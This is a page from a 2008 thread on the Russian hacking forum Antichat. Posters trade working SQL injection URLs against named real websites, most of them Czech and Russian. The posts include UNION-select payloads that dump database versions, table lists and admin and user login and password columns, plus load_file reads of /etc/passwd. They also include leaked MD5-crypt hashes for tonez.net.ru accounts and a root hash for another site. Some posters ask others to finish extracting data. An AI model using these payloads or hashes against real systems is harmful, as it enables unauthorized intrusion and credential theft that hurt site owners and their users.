FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 602 из 1602

602

Опции темы

Поиск в этой теме

Опции просмотра

29.07.2008, 19:31

Calcutta

Постоянный

Регистрация: 06.08.2007

Сообщений: 347

Провел на форуме:
2584838

Репутация: 770

http://www.nord-east.ru/index.php?id=7+union+select+1,concat_ws(0x3a,table _name),3,4+from+information_schema.tables+limit+0, 1--

интересных таблиц не нашел -(

29.07.2008, 19:52

~~otmorozok428~~

Banned

Регистрация: 19.10.2007

Сообщений: 152

Провел на форуме:
557623

Репутация: 415

ToneZ.NET.RU - Мелодии для мобильных телефонов

Цитата:

http://tonez.net.ru/show.php?model=4+union+select+1,2,3,4,5/*
http://tonez.net.ru/show.php?model=4+union+select+1,2,3,concat_ws(char (58,58),version(),user(),database()),5/*

version(): 5.0.45-log
user(): u14145@10.10.10.222
database(): u14145

Список таблиц-столбцов получаем так:

Код:

http://tonez.net.ru/show.php?model=4+union+select+1,2,3,table_name,5+from+information_schema.tables/*
http://tonez.net.ru/show.php?model=4+union+select+1,2,3,column_name,5+from+information_schema.columns+where+table_name+like+char(117,115,101,114,115)/*

Таблицы в базе:

Код:

_pictures
authors
baners
bannertext
catalog
content_sup
melodies
mnews
models
mp3
mp3_pictures
mp3_trash
p_authors
p_authors_copy
p_authors_trash
p_melodies
p_melodies_copy
p_melodies_replace
p_melodies_trash
p_pictures
p_popsearch
pictures
popsearch
voice
voice_trash
accgames
brends
car_fmk
car_img
car_info
codes
countries
firmbrends
firmparts
firms
games
genres
kpk
operators
patches
ph_game_images
ph_game_phones
ph_games
ph_genre
ph_phones
ph_top_games
ph_update
phones
q1
sites
subscribe
subscribe_themes
subscribe_users
targeting
towns
users
works

К сожалению, для доступа к самым интересным таблицам (типа users) не хватает прав. Жаль, ведь счастье было так близко... Может быть, здесь:

Цитата:

http://tonez.net.ru/admin

30.07.2008, 14:20

prescott

Участник форума

Регистрация: 28.07.2008

Сообщений: 158

Провел на форуме:
728470

Репутация: 115

Цитата:

Сообщение от otmorozok428

Доступ к таблицам есть, просто например users в соседней базе лежит:

Код:

http://tonez.net.ru/show.php?model=-1+union+select+1,password,3,login,password+from+u14145_2.users/*

Правда их там всего три, и те админы со странными хэшами

31.07.2008, 02:30

MirA

Новичок

Регистрация: 24.07.2008

Сообщений: 29

Провел на форуме:
109513

Репутация: 52

Цитата:

Сообщение от prescott

Доступ к таблицам есть, просто например users в соседней базе лежит:

Код:

http://tonez.net.ru/show.php?model=-1+union+select+1,password,3,login,password+from+u14145_2.users/*

Правда их там всего три, и те админы со странными хэшами

Это не странные хеши) это MD5(Unix) вроде)

вот и сами хэши

lenar@tonez.net.ru : $1$LenAr$0GbWVUnw3liEE4HT4Gskm0
admin@tonez.net.ru : $1$LenAr$vpSwW7oIhLIYn6n5eLL2W.
music@tonez.net.ru : $1$LenAr$QGD8EMTZSpBkR72abB8Ak.

Последний раз редактировалось MirA; 31.07.2008 в 02:42..

29.07.2008, 19:58

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

Miraclemileshopslv.com - PR 4

Цитата:

http://www.miraclemileshopslv.com/entertainment.php?id=-1+union+select+1,unhex(hex(version())),3,4,5,6,7,8 ,9/*&name=FAB+FOUR

Datahop.net - PR 4

Цитата:

http://www.datahop.net/item_datacentres.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10/*

Recko.name - PR 4

Цитата:

http://www.recko.name/index.php?id=-1'+union+select+version()/*&view=articl

Mobilegamefaqs.com - PR 4

Цитата:

http://www.mobilegamefaqs.com/gameinfo.php?id=99999)+union+select+version()/*

Последний раз редактировалось sabe; 29.07.2008 в 20:23..

30.07.2008, 00:16

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Nemovitosti.cz - PR 5

Цитата:

http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,table_name),v ersion(),4,5,6,7+from+information_schema.tables+li mit+17,1/*

5 версия..

Цитата:

http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,login,passwor d),3,4,5,6,7+from+hartlhaus.webman_user/*

1 таблица с паролями..

Цитата:

http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,login_name,en coded_password),3,4,5,6,7+from++lojza_sk.user+limi t+2,1/*

2 таблица с паролями..

Цитата:

http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,login_name,en coded_password),3,4,5,6,7+from++lojza_demo.user+li mit+2,1/*

3 таблица с паролями..

Цитата:

http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,user,password ),3,4,5,6,7+from+mysql.user/*

рут..

Цитата:

http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,load_file(0x2F6574632F706173 737764),3,4,5,6,7/*

file_priv y

Ewrc.cz - PR 4

Цитата:

http://www.ewrc.cz/ewrc/show.php?id=-7811+union+select+1,2,concat_ws(0x3a,table_name),4 ,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24+from+information_schema.tables+limit +16,1/*

5 версия..

Цитата:

http://www.ewrc.cz/ewrc/show.php?id=-7811+union+select+1,2,concat_ws(0x3a,M_NAME,M_PASS WORD),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24+from+ewrc_cz.user_export/*

юзерпассы )

Vzlu.cz - PR 5

Цитата:

http://www.vzlu.cz/services.php?id=9999999+union+select+concat_ws(0x3 a,database(),user(),version())/*

4 ветка..

Цитата:

http://www.vzlu.cz/services.php?id=9999999+union+select+unhex(hex(con cat_ws(0x3a,version(),user,pass)))+from+users/*

админка

Pragoimex.cz - PR 4

Цитата:

http://www.pragoimex.cz/ru/l.php?id=-40%27+union+select+version()/*

Tvm-valmez.cz - PR 4

Цитата:

http://www.tvm-valmez.cz/index.php?id=109&catit=-104+union+select+version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46/*

Magick.cz - PR 3

Цитата:

http://things.magick.cz/magick/index.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15/*&co=celej

4 ветка..

Цитата:

http://things.magick.cz/magick/index.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,pas sword),8,9,10,11,12,13,14,15+from+mysql.user/*&co=celej

рут..

Цитата:

http://things.magick.cz/magick/index.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2F6574632F7 06173737764),8,9,10,11,12,13,14,15/*&co=celej

file_priv y

Последний раз редактировалось sabe; 30.07.2008 в 05:09..

30.07.2008, 02:52

~~N1K70~~

Banned

Регистрация: 02.01.2008

Сообщений: 195

Провел на форуме:
523549

Репутация: 301

Код:

http://www.myspacegamesandvideos.com/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99%20UNION%20SELECT%20concat(char(58),uname,char(58),password),2,3,4,5,6,7,8,9,0,1,2,3%20FROM%20users--

root:7c49f9a7e14cb74eefa0e34f7fd09eb4

30.07.2008, 03:28

MirA

Новичок

Регистрация: 24.07.2008

Сообщений: 29

Провел на форуме:
109513

Репутация: 52

http://www.cstore.ru/

Цитата:

http://www.cstore.ru/download.php?id=9999+union+select+1,2,3,4,5,concat _ws(char(32,58,32),user(),database(),version()),7, 8,9,10/*&%20SessionID=89a2d2a4880545b115cc

version = 4.0.27-log
user = qwe1rty@pm9.zenon.net
database = qwe1rty

Не смог подобрать таблички,кто сделает это, буду очень благодарен,если сообщит об этом =)

30.07.2008, 03:51

DDoSька

Постоянный

Регистрация: 05.05.2008

Сообщений: 403

Провел на форуме:
2375039

Репутация: 1160

http://www.cult.bg/ind_dotCult_full.php?id=-81+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3

User:Root@localhost
Version:5
Только чето сайт какой-то у меня медленный,замучался крутить,так и не докрутил
таблиц со словом forum около 5-8
----
Ресурс очень большой,кажись по кулютуре Болгарии,я бы с радостью раскрутил НО...

Последний раз редактировалось DDoSька; 30.07.2008 в 04:05..

#10

30.07.2008, 04:30

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Rave.cz - PR 5

Цитата:

http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,version(),9,10,11 ,12,13,14,15,16,17,18,19,unhex(hex(table_name)),21 ,22,23,24,25,26+from+information_schema.tables--

5 ветка.. вот и таблы..

Цитата:

http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,hes lo))),21,22,23,24,25,26+from+auth_admin--

это хеши админов..

Цитата:

http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,hes lo))),21,22,23,24,25,26+from+rave_admin_auth+limit +2,1--

что это за хеш? тоже админов..

Цитата:

http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,pas sword))),21,22,23,24,25,26+from+users--

вот это уже юзеры..

Цитата:

http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,pas sword))),21,22,23,24,25,26+from+users_zaloha--

и еще юзеры..)

Clovekvtisni.cz - PR 5

Цитата:

http://clovekvtisni.cz/index2en.php?id=511+union+select+1,concat_ws(0x3a, table_name,table_schema),3+from+information_schema .tables/*

5 версия и таблы..

Цитата:

http://clovekvtisni.cz/index2en.php?id=511+union+select+1,concat_ws(0x3a, mail,psswd),3+from+apl/*

апликанты))

Цитата:

http://clovekvtisni.cz/index2en.php?id=511+union+select+1,concat_ws(0x3a, email,password),3+from+pinf.users/*

каких то 3 несчастных юзера..

Cagi.cz - PR 5

Цитата:

http://www.cagi.cz/novinka.php?id=-171%27+union+select+1,2,3,version(),5,6/*